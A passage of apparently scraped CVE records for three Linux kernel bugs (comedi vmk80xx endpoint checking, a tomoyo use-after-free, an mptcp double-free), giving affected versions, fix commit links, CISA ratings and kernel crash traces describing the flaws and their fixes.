"role": "CISA Coordinator",
"timestamp": "2024-07-17T14:56:33.918930Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-17T14:56:44.201Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:16:17.466Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3a63ae0348d990e137cca04eced5b08379969ea9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a3b8ae7e9297dd453f2977b011c5bc75eb20e71b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f15370e315976198f338b41611f37ce82af6cf54"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b0b268eeb087e324ef3ea71f8e6cabd07630517f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ac882d6b21bffecb57bcc4486701239eef5aa67b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/59f33af9796160f851641d960bd93937f282c696"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6ec3514a7d35ad9cfab600187612c29f669069d2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d1718530e3f640b7d5f0050e725216eab57a85d8"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/comedi/drivers/vmk80xx.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3a63ae0348d990e137cca04eced5b08379969ea9",
"status": "affected",
"version": "49253d542cc0f5f771dc254d248162a2a666649d",
"versionType": "git"
},
{
"lessThan": "a3b8ae7e9297dd453f2977b011c5bc75eb20e71b",
"status": "affected",
"version": "49253d542cc0f5f771dc254d248162a2a666649d",
"versionType": "git"
},
{
"lessThan": "f15370e315976198f338b41611f37ce82af6cf54",
"status": "affected",
"version": "49253d542cc0f5f771dc254d248162a2a666649d",
"versionType": "git"
},
{
"lessThan": "b0b268eeb087e324ef3ea71f8e6cabd07630517f",
"status": "affected",
"version": "49253d542cc0f5f771dc254d248162a2a666649d",
"versionType": "git"
},
{
"lessThan": "ac882d6b21bffecb57bcc4486701239eef5aa67b",
"status": "affected",
"version": "49253d542cc0f5f771dc254d248162a2a666649d",
"versionType": "git"
},
{
"lessThan": "59f33af9796160f851641d960bd93937f282c696",
"status": "affected",
"version": "49253d542cc0f5f771dc254d248162a2a666649d",
"versionType": "git"
},
{
"lessThan": "6ec3514a7d35ad9cfab600187612c29f669069d2",
"status": "affected",
"version": "49253d542cc0f5f771dc254d248162a2a666649d",
"versionType": "git"
},
{
"lessThan": "d1718530e3f640b7d5f0050e725216eab57a85d8",
"status": "affected",
"version": "49253d542cc0f5f771dc254d248162a2a666649d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/comedi/drivers/vmk80xx.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.9"
},
{
"lessThan": "3.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.157",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.88",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.29",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.157",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.88",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.29",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.8",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: vmk80xx: fix incomplete endpoint checking\n\nWhile vmk80xx does have endpoint checking implemented, some things\ncan fall through the cracks. Depending on the hardware model,\nURBs can have either bulk or interrupt type, and current version\nof vmk80xx_find_usb_endpoints() function does not take that fully\ninto account. While this warning does not seem to be too harmful,\nat the very least it will crash systems with \u0027panic_on_warn\u0027 set on\nthem.\n\nFix the issue found by Syzkaller [1] by somewhat simplifying the\nendpoint checking process with usb_find_common_endpoints() and\nensuring that only expected endpoint types are present.\n\nThis patch has not been tested on real hardware.\n\n[1] Syzkaller report:\nusb 1-1: BOGUS urb xfer, pipe 1 != type 3\nWARNING: CPU: 0 PID: 781 at drivers/usb/core/urb.c:504 usb_submit_urb+0xc4e/0x18c0 drivers/usb/core/urb.c:503\n...\nCall Trace:\n \u003cTASK\u003e\n usb_start_wait_urb+0x113/0x520 drivers/usb/core/message.c:59\n vmk80xx_reset_device drivers/comedi/drivers/vmk80xx.c:227 [inline]\n vmk80xx_auto_attach+0xa1c/0x1a40 drivers/comedi/drivers/vmk80xx.c:818\n comedi_auto_config+0x238/0x380 drivers/comedi/drivers.c:1067\n usb_probe_interface+0x5cd/0xb00 drivers/usb/core/driver.c:399\n...\n\nSimilar issue also found by Syzkaller:"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:01:53.102Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3a63ae0348d990e137cca04eced5b08379969ea9"
},
{
"url": "https://git.kernel.org/stable/c/a3b8ae7e9297dd453f2977b011c5bc75eb20e71b"
},
{
"url": "https://git.kernel.org/stable/c/f15370e315976198f338b41611f37ce82af6cf54"
},
{
"url": "https://git.kernel.org/stable/c/b0b268eeb087e324ef3ea71f8e6cabd07630517f"
},
{
"url": "https://git.kernel.org/stable/c/ac882d6b21bffecb57bcc4486701239eef5aa67b"
},
{
"url": "https://git.kernel.org/stable/c/59f33af9796160f851641d960bd93937f282c696"
},
{
"url": "https://git.kernel.org/stable/c/6ec3514a7d35ad9cfab600187612c29f669069d2"
},
{
"url": "https://git.kernel.org/stable/c/d1718530e3f640b7d5f0050e725216eab57a85d8"
}
],
"title": "comedi: vmk80xx: fix incomplete endpoint checking",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27001",
"datePublished": "2024-05-01T05:28:40.341Z",
"dateReserved": "2024-02-19T14:20:24.207Z",
"dateUpdated": "2025-11-04T17:16:17.466Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26622 (GCVE-0-2024-26622)
Vulnerability from cvelistv5
Published
2024-03-04 06:40
Modified
2025-11-04 18:29
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tomoyo: fix UAF write bug in tomoyo_write_control()
Since tomoyo_write_control() updates head->write_buf when write()
of long lines is requested, we need to fetch head->write_buf after
head->io_sem is held. Otherwise, concurrent write() requests can
cause use-after-free-write and double-free problems.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: bd03a3e4c9a9df0c6b007045fa7fc8889111a478 Version: bd03a3e4c9a9df0c6b007045fa7fc8889111a478 Version: bd03a3e4c9a9df0c6b007045fa7fc8889111a478 Version: bd03a3e4c9a9df0c6b007045fa7fc8889111a478 Version: bd03a3e4c9a9df0c6b007045fa7fc8889111a478 Version: bd03a3e4c9a9df0c6b007045fa7fc8889111a478 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T18:29:54.714Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a23ac1788e2c828c097119e9a3178f0b7e503fee"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7d930a4da17958f869ef679ee0e4a8729337affc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3bfe04c1273d30b866f4c7c238331ed3b08e5824"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2caa605079488da9601099fbda460cfc1702839f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6edefe1b6c29a9932f558a898968a9fcbeec5711"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2f03fc340cac9ea1dc63cbf8c93dd2eb0f227815"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IVVYSTEVMPYGF6GDSOD44MUXZXAZHOHB/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26622",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:56:14.798653Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:34.406Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"security/tomoyo/common.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a23ac1788e2c828c097119e9a3178f0b7e503fee",
"status": "affected",
"version": "bd03a3e4c9a9df0c6b007045fa7fc8889111a478",
"versionType": "git"
},
{
"lessThan": "7d930a4da17958f869ef679ee0e4a8729337affc",
"status": "affected",
"version": "bd03a3e4c9a9df0c6b007045fa7fc8889111a478",
"versionType": "git"
},
{
"lessThan": "3bfe04c1273d30b866f4c7c238331ed3b08e5824",
"status": "affected",
"version": "bd03a3e4c9a9df0c6b007045fa7fc8889111a478",
"versionType": "git"
},
{
"lessThan": "2caa605079488da9601099fbda460cfc1702839f",
"status": "affected",
"version": "bd03a3e4c9a9df0c6b007045fa7fc8889111a478",
"versionType": "git"
},
{
"lessThan": "6edefe1b6c29a9932f558a898968a9fcbeec5711",
"status": "affected",
"version": "bd03a3e4c9a9df0c6b007045fa7fc8889111a478",
"versionType": "git"
},
{
"lessThan": "2f03fc340cac9ea1dc63cbf8c93dd2eb0f227815",
"status": "affected",
"version": "bd03a3e4c9a9df0c6b007045fa7fc8889111a478",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"security/tomoyo/common.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.1"
},
{
"lessThan": "3.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.212",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.151",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.81",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.21",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.212",
"versionStartIncluding": "3.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.151",
"versionStartIncluding": "3.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.81",
"versionStartIncluding": "3.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.21",
"versionStartIncluding": "3.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.9",
"versionStartIncluding": "3.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "3.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntomoyo: fix UAF write bug in tomoyo_write_control()\n\nSince tomoyo_write_control() updates head-\u003ewrite_buf when write()\nof long lines is requested, we need to fetch head-\u003ewrite_buf after\nhead-\u003eio_sem is held. Otherwise, concurrent write() requests can\ncause use-after-free-write and double-free problems."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:52:31.663Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a23ac1788e2c828c097119e9a3178f0b7e503fee"
},
{
"url": "https://git.kernel.org/stable/c/7d930a4da17958f869ef679ee0e4a8729337affc"
},
{
"url": "https://git.kernel.org/stable/c/3bfe04c1273d30b866f4c7c238331ed3b08e5824"
},
{
"url": "https://git.kernel.org/stable/c/2caa605079488da9601099fbda460cfc1702839f"
},
{
"url": "https://git.kernel.org/stable/c/6edefe1b6c29a9932f558a898968a9fcbeec5711"
},
{
"url": "https://git.kernel.org/stable/c/2f03fc340cac9ea1dc63cbf8c93dd2eb0f227815"
}
],
"title": "tomoyo: fix UAF write bug in tomoyo_write_control()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26622",
"datePublished": "2024-03-04T06:40:01.754Z",
"dateReserved": "2024-02-19T14:20:24.134Z",
"dateUpdated": "2025-11-04T18:29:54.714Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26782 (GCVE-0-2024-26782)
Vulnerability from cvelistv5
Published
2024-04-04 08:20
Modified
2025-05-04 08:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mptcp: fix double-free on socket dismantle
when MPTCP server accepts an incoming connection, it clones its listener
socket. However, the pointer to 'inet_opt' for the new socket has the same
value as the original one: as a consequence, on program exit it's possible
to observe the following splat:
BUG: KASAN: double-free in inet_sock_destruct+0x54f/0x8b0
Free of addr ffff888485950880 by task swapper/25/0
CPU: 25 PID: 0 Comm: swapper/25 Kdump: loaded Not tainted 6.8.0-rc1+ #609
Hardware name: Supermicro SYS-6027R-72RF/X9DRH-7TF/7F/iTF/iF, BIOS 3.0 07/26/2013
Call Trace:
<IRQ>
dump_stack_lvl+0x32/0x50
print_report+0xca/0x620
kasan_report_invalid_free+0x64/0x90
__kasan_slab_free+0x1aa/0x1f0
kfree+0xed/0x2e0
inet_sock_destruct+0x54f/0x8b0
__sk_destruct+0x48/0x5b0
rcu_do_batch+0x34e/0xd90
rcu_core+0x559/0xac0
__do_softirq+0x183/0x5a4
irq_exit_rcu+0x12d/0x170
sysvec_apic_timer_interrupt+0x6b/0x80
</IRQ>
<TASK>
asm_sysvec_apic_timer_interrupt+0x16/0x20
RIP: 0010:cpuidle_enter_state+0x175/0x300
Code: 30 00 0f 84 1f 01 00 00 83 e8 01 83 f8 ff 75 e5 48 83 c4 18 44 89 e8 5b 5d 41 5c 41 5d 41 5e 41 5f c3 cc cc cc cc fb 45 85 ed <0f> 89 60 ff ff ff 48 c1 e5 06 48 c7 43 18 00 00 00 00 48 83 44 2b
RSP: 0018:ffff888481cf7d90 EFLAGS: 00000202
RAX: 0000000000000000 RBX: ffff88887facddc8 RCX: 0000000000000000
RDX: 1ffff1110ff588b1 RSI: 0000000000000019 RDI: ffff88887fac4588
RBP: 0000000000000004 R08: 0000000000000002 R09: 0000000000043080
R10: 0009b02ea273363f R11: ffff88887fabf42b R12: ffffffff932592e0
R13: 0000000000000004 R14: 0000000000000000 R15: 00000022c880ec80
cpuidle_enter+0x4a/0xa0
do_idle+0x310/0x410
cpu_startup_entry+0x51/0x60
start_secondary+0x211/0x270
secondary_startup_64_no_verify+0x184/0x18b
</TASK>
Allocated by task 6853:
kasan_save_stack+0x1c/0x40
kasan_save_track+0x10/0x30
__kasan_kmalloc+0xa6/0xb0
__kmalloc+0x1eb/0x450
cipso_v4_sock_setattr+0x96/0x360
netlbl_sock_setattr+0x132/0x1f0
selinux_netlbl_socket_post_create+0x6c/0x110
selinux_socket_post_create+0x37b/0x7f0
security_socket_post_create+0x63/0xb0
__sock_create+0x305/0x450
__sys_socket_create.part.23+0xbd/0x130
__sys_socket+0x37/0xb0
__x64_sys_socket+0x6f/0xb0
do_syscall_64+0x83/0x160
entry_SYSCALL_64_after_hwframe+0x6e/0x76
Freed by task 6858:
kasan_save_stack+0x1c/0x40
kasan_save_track+0x10/0x30
kasan_save_free_info+0x3b/0x60
__kasan_slab_free+0x12c/0x1f0
kfree+0xed/0x2e0
inet_sock_destruct+0x54f/0x8b0
__sk_destruct+0x48/0x5b0
subflow_ulp_release+0x1f0/0x250
tcp_cleanup_ulp+0x6e/0x110
tcp_v4_destroy_sock+0x5a/0x3a0
inet_csk_destroy_sock+0x135/0x390
tcp_fin+0x416/0x5c0
tcp_data_queue+0x1bc8/0x4310
tcp_rcv_state_process+0x15a3/0x47b0
tcp_v4_do_rcv+0x2c1/0x990
tcp_v4_rcv+0x41fb/0x5ed0
ip_protocol_deliver_rcu+0x6d/0x9f0
ip_local_deliver_finish+0x278/0x360
ip_local_deliver+0x182/0x2c0
ip_rcv+0xb5/0x1c0
__netif_receive_skb_one_core+0x16e/0x1b0
process_backlog+0x1e3/0x650
__napi_poll+0xa6/0x500
net_rx_action+0x740/0xbb0
__do_softirq+0x183/0x5a4
The buggy address belongs to the object at ffff888485950880
which belongs to the cache kmalloc-64 of size 64
The buggy address is located 0 bytes inside of
64-byte region [ffff888485950880, ffff8884859508c0)
The buggy address belongs to the physical page:
page:0000000056d1e95e refcount:1 mapcount:0 mapping:0000000000000000 index:0xffff888485950700 pfn:0x485950
flags: 0x57ffffc0000800(slab|node=1|zone=2|lastcpupid=0x1fffff)
page_type: 0xffffffff()
raw: 0057ffffc0000800 ffff88810004c640 ffffea00121b8ac0 dead000000000006
raw: ffff888485950700 0000000000200019 00000001ffffffff 0000000000000000
page dumped because: kasan: bad access detected
Memory state around the buggy address:
ffff888485950780: fa fb fb
---truncated---
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: cf7da0d66cc1a2a19fc5930bb746ffbb2d4cd1be Version: cf7da0d66cc1a2a19fc5930bb746ffbb2d4cd1be Version: cf7da0d66cc1a2a19fc5930bb746ffbb2d4cd1be Version: cf7da0d66cc1a2a19fc5930bb746ffbb2d4cd1be Version: cf7da0d66cc1a2a19fc5930bb746ffbb2d4cd1be Version: cf7da0d66cc1a2a19fc5930bb746ffbb2d4cd1be |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.370Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f74362a004225df935863dea6eb7d82daaa5b16e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4a4eeb6912538c2d0b158e8d11b62d96c1dada4e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d93fd40c62397326046902a2c5cb75af50882a85"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ce0809ada38dca8d6d41bb57ab40494855c30582"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/85933e80d077c9ae2227226beb86c22f464059cc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/10048689def7e40a4405acda16fdc6477d4ecc5c"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26782",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:51:05.325955Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:51.835Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/mptcp/protocol.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f74362a004225df935863dea6eb7d82daaa5b16e",
"status": "affected",
"version": "cf7da0d66cc1a2a19fc5930bb746ffbb2d4cd1be",
"versionType": "git"
},
{
"lessThan": "4a4eeb6912538c2d0b158e8d11b62d96c1dada4e",
"status": "affected",
"version": "cf7da0d66cc1a2a19fc5930bb746ffbb2d4cd1be",
"versionType": "git"
},
{
"lessThan": "d93fd40c62397326046902a2c5cb75af50882a85",
"status": "affected",
"version": "cf7da0d66cc1a2a19fc5930bb746ffbb2d4cd1be",
"versionType": "git"
},
{
"lessThan": "ce0809ada38dca8d6d41bb57ab40494855c30582",
"status": "affected",
"version": "cf7da0d66cc1a2a19fc5930bb746ffbb2d4cd1be",
"versionType": "git"
},
{
"lessThan": "85933e80d077c9ae2227226beb86c22f464059cc",
"status": "affected",
"version": "cf7da0d66cc1a2a19fc5930bb746ffbb2d4cd1be",
"versionType": "git"
},
{
"lessThan": "10048689def7e40a4405acda16fdc6477d4ecc5c",
"status": "affected",
"version": "cf7da0d66cc1a2a19fc5930bb746ffbb2d4cd1be",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/mptcp/protocol.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.6"
},
{
"lessThan": "5.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.212",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.151",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.81",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.21",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.212",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.151",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.81",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.21",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.9",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix double-free on socket dismantle\n\nwhen MPTCP server accepts an incoming connection, it clones its listener\nsocket. However, the pointer to \u0027inet_opt\u0027 for the new socket has the same\nvalue as the original one: as a consequence, on program exit it\u0027s possible\nto observe the following splat:\n\n BUG: KASAN: double-free in inet_sock_destruct+0x54f/0x8b0\n Free of addr ffff888485950880 by task swapper/25/0\n\n CPU: 25 PID: 0 Comm: swapper/25 Kdump: loaded Not tainted 6.8.0-rc1+ #609\n Hardware name: Supermicro SYS-6027R-72RF/X9DRH-7TF/7F/iTF/iF, BIOS 3.0 07/26/2013\n Call Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x32/0x50\n print_report+0xca/0x620\n kasan_report_invalid_free+0x64/0x90\n __kasan_slab_free+0x1aa/0x1f0\n kfree+0xed/0x2e0\n inet_sock_destruct+0x54f/0x8b0\n __sk_destruct+0x48/0x5b0\n rcu_do_batch+0x34e/0xd90\n rcu_core+0x559/0xac0\n __do_softirq+0x183/0x5a4\n irq_exit_rcu+0x12d/0x170\n sysvec_apic_timer_interrupt+0x6b/0x80\n \u003c/IRQ\u003e\n \u003cTASK\u003e\n asm_sysvec_apic_timer_interrupt+0x16/0x20\n RIP: 0010:cpuidle_enter_state+0x175/0x300\n Code: 30 00 0f 84 1f 01 00 00 83 e8 01 83 f8 ff 75 e5 48 83 c4 18 44 89 e8 5b 5d 41 5c 41 5d 41 5e 41 5f c3 cc cc cc cc fb 45 85 ed \u003c0f\u003e 89 60 ff ff ff 48 c1 e5 06 48 c7 43 18 00 00 00 00 48 83 44 2b\n RSP: 0018:ffff888481cf7d90 EFLAGS: 00000202\n 